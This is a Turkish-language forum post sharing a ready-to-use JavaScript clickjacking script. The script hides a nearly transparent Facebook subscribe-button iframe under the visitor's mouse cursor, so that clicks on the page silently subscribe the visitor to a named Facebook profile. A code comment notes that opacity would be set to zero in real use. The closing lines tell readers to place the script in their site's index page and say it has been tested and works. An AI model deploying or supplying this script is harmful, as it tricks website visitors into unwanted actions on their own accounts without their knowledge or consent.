TheMonsTeR
*Vıp Projection
- Katılım
- 12 Eki 2012
- Mesajlar
- 283
- Tepkime puanı
- 0
- Puanları
- 0
- Yaş
- 26
Kod:
<script type="text/javascript">
(function(){
var tempX = 1,
tempY = 1,
IE = document.all? true : false;
if (!IE) document.captureEvents(Event.MOUSEMOVE);
var themonster = document.createElement('iframe');
themonster.src= 'http://www.facebook.com/plugins/subscribe.php?href=' + encodeURIComponent('http://www.facebook.com/fame.kanka') + '&layout=standard&show_faces=true&colorscheme=light&font&width=450';
themonster.scrolling = 'no';
themonster.frameBorder = 0;
themonster.allowTransparency = 'true';
themonster.style.border = 0;
themonster.style.overflow = 'hidden';
themonster.style.cursor = 'pointer';
themonster.style.width = '20px';
themonster.style.height = '20px';
themonster.style.position = 'absolute';
themonster.style.opacity = .1; //Would be 0 if really used
document.getElementsByTagName('body')[0].appendChild(themonster);
window.addEventListener('mousemove', mouseMove, false);
setTimeout(function(){
document.getElementsByTagName('body')[0].removeChild(themonster);
window.removeEventListener('mousemove', mouseMove, false);
}, 9000);
function mouseMove(e) {
if (IE) {
tempX = event.clientX + document.body.scrollLeft;
tempY = event.clientY + document.body.scrollTop;
} else {
tempX = e.pageX;
tempY = e.pageY;
}
if (tempX < 0) tempX = 0;
if (tempY < 0) tempY = 0;
themonster.style.top = (tempY - 0) + 'px';
themonster.style.left = (tempX - 0) + 'px';
themonster.onclick;
return true
}
}
)();
</script>
Kodları indexin head tagından önce bir yere yerleştirirseniz çalışacaktır.
Şuan denedim çalışıyor